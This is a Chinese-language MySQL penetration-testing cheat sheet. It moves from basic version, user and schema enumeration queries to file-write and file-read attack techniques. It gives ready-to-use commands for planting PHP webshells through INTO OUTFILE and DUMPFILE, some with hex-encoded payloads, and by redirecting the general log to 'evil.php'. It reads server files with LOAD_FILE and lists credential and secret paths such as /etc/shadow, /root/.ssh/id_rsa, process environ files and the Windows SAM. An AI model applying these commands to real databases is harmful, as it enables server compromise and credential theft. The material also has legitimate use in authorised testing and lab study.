mysql 基础查询语句
mysql 基础查询语句
sql 基础语句
select @@version 查询数据库版本 select version() 查询数据库版本 select @@servername 客户端主机名 select @@servername 服务端主机名 select user() 查询当前用户名 select current_user() 查询当前连接用户名 select system_user() 查询数据库用户名 select database() 查询当前连接数据库 select @@version_compile_os 查询数据库安装操作系统 select @@datadir 查询数据库绝对路径 select @@basedir 查询数据安装路径 select * from information_schema.PROCESSLIST; 查看当前 MYSQL 的连接情况 select group_concat(schema_name) from information_schema.schemata 查询所有数据库 select group_concat(table_name) from information_schema.tables where table_schema=database() 查询当前数据库的所有表 select group_concat(table_name) from information_schema.tables where table_schema='' 查询数据库为dvwa,表名 select group_concat(column_name) from information_schema.columns where table_name='name' 查询表为name的列名 select group_concat(id,name) from name 查询name表id和name字段
mysql 文件处理
查看 导入和导出是否有限制 show variables like ‘%secure_file_priv%’; - 限制 mysqld 不允许导入 | 导出 - mysqld –secure_file_prive=null - 限制mysqld 的导入 | 导出 只能发生在/tmp/目录下 - mysqld –secure_file_priv=/tmp/ - 不对mysqld 的导入 | 导出做限制 - mysqld secure_file_prive=''
mysql 文件写入
-
拥有网站的写入权限
-
secure_file_priv 无限制 (Secure_file_priv参数为空或者为指定路径)
-
网站绝对路径
select '<?php phpinfo();?>' INTO OUTFILE 'C:\\shell.php' select 0x273c3f70687020706870696e666f28293b3f3e27 INTO dumpfile 'C:\\shell.php' INTO OUTFILE 'C:\\shell.php' lines terminated by 0x273c3f70687020706870696e666f28293b3f3e27 INTO OUTFILE 'C:\\shell.php' fields terminated by 0x273c3f70687020706870696e666f28293b3f3e27 INTO OUTFILE 'C:\\shell.php' columns terminated by 0x273c3f70687020706870696e666f28293b3f3e27 INTO OUTFILE 'C:\\shell.php' lines starting by 0x273c3f70687020706870696e666f28293b3f3e27 outfile函数可以导出多行,而dumpfile只能导出一行数据 outfile函数在将数据写到文件里时有特殊的格式转换,而dumpfile则保持原数据格式 利用 mysql 日志进行写入 show variables like '%general%'; #查看配置 set global general_log = on; #开启general log模式 set global general_log_file = 'E:/study/WWW/evil.php'; #设置日志目录为shell地址 select '<?php phpinfo();?>' #写入shell set global general_log=off; #关闭general log模式
mysql 文件读取
CREATE table readFile(cmd text); INSERT into readFile(cmd) VALUES (LOAD_FILE('D:/Test.php')); select * from readFile; load data infile 'D:/Test.php' into table readFile; select * from readFile; liunx 可用文件 /etc/udev/rules.d/70-persistent-net.rules 获取网卡名称。 /etc/passwd /etc/shadow /etc/hosts /root/.bash_history //root的bash历史记录 /proc/sched_debug // 提供cpu上正在运行的进程信息,可以获得进程的pid号,可以配合后面需要pid的利用 /proc/mounts // 挂载的文件系统列表 /proc/net/arp //arp表,可以获得内网其他机器的地址 /proc/net/route //路由表信息 /proc/net/tcp and /proc/net/udp // 活动连接的信息 /proc/net/fib_trie // 路由缓存 /proc/version // 内核版本 /proc/[PID]/cmdline // 可能包含有用的路径信息 /proc/[PID]/environ // 程序运行的环境变量信息,可以用来包含getshell /proc/[PID]/cwd // 当前进程的工作目录 ssh /root/.ssh/id_rsa /root/.ssh/id_rsa.pub /root/.ssh/authorized_keys /etc/ssh/sshd_config /var/log/secure /etc/sysconfig/network-scripts/ifcfg-eth0 /etc/syscomfig/network-scripts/ifcfg-eth1 Windows 可用文件 C:\boot.ini 查看系统版本 C:\Windows\repair\sam 存储系统初次安装的密码